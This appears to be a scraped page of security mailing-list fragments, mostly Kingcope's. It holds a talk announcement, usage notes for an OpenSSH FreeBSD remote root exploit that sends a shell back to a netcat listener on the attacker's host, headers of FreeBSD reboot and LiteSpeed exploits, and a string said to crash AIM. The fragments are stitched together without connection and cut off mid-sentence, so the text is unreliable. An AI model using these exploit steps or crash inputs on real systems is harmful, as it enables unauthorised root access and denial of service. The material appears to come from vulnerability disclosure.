Hello lists,
you can view my slides notes for my talk entitled Uncovering
Zero-Days and advanced fuzzing held at AthCon 2012 at the following
places:
http://www.isowarez.de/
http://kingcope.wordpress.com/
Cheerio,
/Kingcope
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z yourip target
setup a netcat, port 443 on yourip first
a statically linked linux binary of the exploit can be found below
you can apply the patch using the diff if you don't want to run that.
2011/7/1 Benji m...@b3nji.com:
So you want people to download your statically linked binary?
On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
OpenSSH FreeBSD Remote Root Exploit
# Exploit Title: FreeBSD local denial of service - forced reboot
# Date: 28. January 2011
# Author: Kingcope
# Software Link: http://www.freebsd.org
# Operating System: FreeBSD
# Tested on: 8.0-RELEASE
This source code when compiled and executed
will reboot at least FreeBSD 8.0-RELEASE because of
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard
Even if it did work, the user would have to submit the form with the username
or password fields containing the exploit code rather than enter their own
information.
Pretty unlikely to pull off.
Regardless I talked to the developers and any potential issue will be fixed in
v2.2.13 which is
As all Ascii-Symbols can be displayed in #XXX; format, where XXX are
numbers from 0-255, AIM seems not to check the XXX for higher values
and some strings above 255 result in aim crashing completely or in part.
E.g. the string #770; will result in crashing the whole aim, but #771;
will crash only